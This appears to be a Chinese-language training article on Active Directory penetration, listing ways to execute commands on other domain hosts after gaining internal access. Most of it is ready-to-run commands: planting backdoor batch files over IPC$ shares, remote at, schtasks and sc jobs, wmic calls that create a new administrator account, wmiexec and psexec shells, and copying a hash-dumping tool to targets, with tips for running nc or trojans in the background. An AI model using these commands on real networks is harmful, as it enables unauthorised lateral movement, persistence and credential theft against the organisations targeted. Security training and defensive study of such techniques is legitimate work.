內(nèi)網(wǎng)滲透之域滲透命令執(zhí)行總結(jié)

　　AD的全稱是Active Directory：活動目錄

　　域(Domain)是Windows網(wǎng)絡中獨立運行的單位，域之間相互訪問則需要建立信任關系(即Trust Relation)。信任關系是連接在域與域之間的橋梁。當一個域與其他域建立了信任關系后兩個域之間不但可以按需要相互進行管理，還可以跨網(wǎng)分配文件和打印機等設備資源，使不同的域之間實現(xiàn)網(wǎng)絡資源的共享與管理，以及相互通信和數(shù)據(jù)傳輸。

　　在域滲透場景中，我們已經(jīng)進入內(nèi)網(wǎng)，會遇到大量的開放端口和服務，弱密碼空密碼，這個時候我們可以使用它們已經(jīng)開啟的服務選擇對應的方式進行命令執(zhí)行。本文對ad域滲透中常見的命令執(zhí)行方式進行一個總結(jié)。

　　ipc

　　前提

　　開啟ipc共享

　　配置本地安全策略：開始->運行-> secpol.msc->本地策略->安全選項->網(wǎng)絡訪問：共享>和本地帳戶的安全模型>經(jīng)典-本地用戶進行身份驗證

　　配置本地組策略：運行gpedit.msc ——計算機配置——Windows設置——安全設置——本地策略 ——安全選項——用戶賬戶控制：以管理員批準模式運行所有管理員——禁用。

　　文件共享

　　寫入后門文件

　　net use z: \\目標IP\c$ "passwd" /user:"admin"

　　或

　　copy hack.bat \\目標ip\c$

　　#刪除連接

　　net use \\目標IP\ipc$ /del

　　后續(xù)使用下面的方式執(zhí)行

　　at(win10不可用)

　　定時任務執(zhí)行命令

　　前提

　　開啟windows Event log服務，開啟Task Scheduler服務

　　其余條件同ipc

　　命令執(zhí)行

　　at \\170.170.64.19 23:00 c:\windows\system32\calc.exe

　　at \\170.170.64.19 1 delete /yes #刪除本機1號任務

　　schtasks

　　前提

　　開啟windows Event log服務，開啟Task Scheduler服務

　　其余條件同ipc

　　schtasks /create /tn firstTask /tr "c:\windows\system32\cmd.exe /c calc" /sc once /st 00:00 /S 170.170.64.19 /RU System /u admin /p passwd

　　schtasks /run /tn firstTask /S 170.170.64.19 /u admin /p passwd

　　schtasks /F /delete /tn firstTask /S 170.170.64.19 /u admin /p passwd

　　telnet

　　前提

　　開啟telnet服務

　　命令執(zhí)行

　　telnet 目標ip

　　之后可執(zhí)行命令

　　sc

　　windows2003

　　windows XP

　　命令執(zhí)行

　　sc \\170.170.64.19 create testSC binPath= "cmd.exe /c start c:\windows\hack.bat"

　　sc \\170.170.64.19 start testSC

　　sc \\170.170.64.19 delete testSC

　　wmic

　　前提

　　開啟wmi服務，135端口

　　命令執(zhí)行

　　wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c calc.exe"

　　wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c net user test 123456 /add && net localgroup administrators test /add"

　　wmiexec.vbs(需要安裝)

　　前提

　　開啟wmi服務，135端口

　　安裝

　　下載vmiexec.vbs

　　命令執(zhí)行

　　cscript.exe //nologo wmiexec.vbs /shell 170.170.64.19 admin passwd

　　cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd "cmdkey /list"

　　cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd c:\programdata\test.bat

　　#其他參數(shù)

　　-wait5000 表示這個命令等待5s后再讀取結(jié)果，用于運行“運行時間長”的命令。

　　-persist 程序會在后臺運行，不會有結(jié)果輸出，而且會返回這個命令進程的 PID，方便結(jié)束進程，用于運行 nc 或者木馬程序。

　　impackets wmiexec(需要安裝)

　　前提

　　開啟wmi服務，135端口

　　安裝

　　git clone https://github.com/SecureAuthCorp/impacket/

　　pip install -r requirements.txt

　　pip install impacket

　　命令執(zhí)行

　　#獲取遠程計算機交互式shell

　　python wmiexec.py admin:passwd@170.170.64.19

　　psexec(需要安裝)

　　前提

　　開啟admin$共享

　　安裝

　　在 https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

　　下載安裝

　　命令執(zhí)行

　　#打開交互式shell

　　psexec \\170.170.64.19 -u admin -p passwd cmd

　　#執(zhí)行單條命令

　　psexec \\170.170.64.19 -u admin -p passwd -s cmd /c "calc.exe"

　　#拷貝文件到遠程計算機并執(zhí)行

　　psexec \\170.170.64.19 -u admin -p passwd -c C:\Users\Administrator\Desktop\GetHashes.exe

　　#其他參數(shù)

　　–accepteula 第一次運行會彈框,輸入這個參數(shù)便不會彈框

　　-s 以 “nt authority\system” 權限運行遠程進程

　　-h 如果可以，以管理員權限運行遠程進程

　　-d 不等待程序執(zhí)行完就返回，請只對非交互式應用程序使用此選項

　　\\ip 可以替換成 @ip.txt (存放多個 ip 的文本)，可以批量執(zhí)行命令

　　遠程桌面

　　前提

　　開啟遠程桌面，3389端口

　　命令執(zhí)行

　　可直接通過mstsc進入目標系統(tǒng)。

　　更多關于"IT網(wǎng)絡安全培訓"的問題，歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓服務經(jīng)驗，采用全程面授高品質(zhì)、高體驗培養(yǎng)模式，擁有國內(nèi)一體化教學管理及學員服務，助力更多學員實現(xiàn)高薪夢想。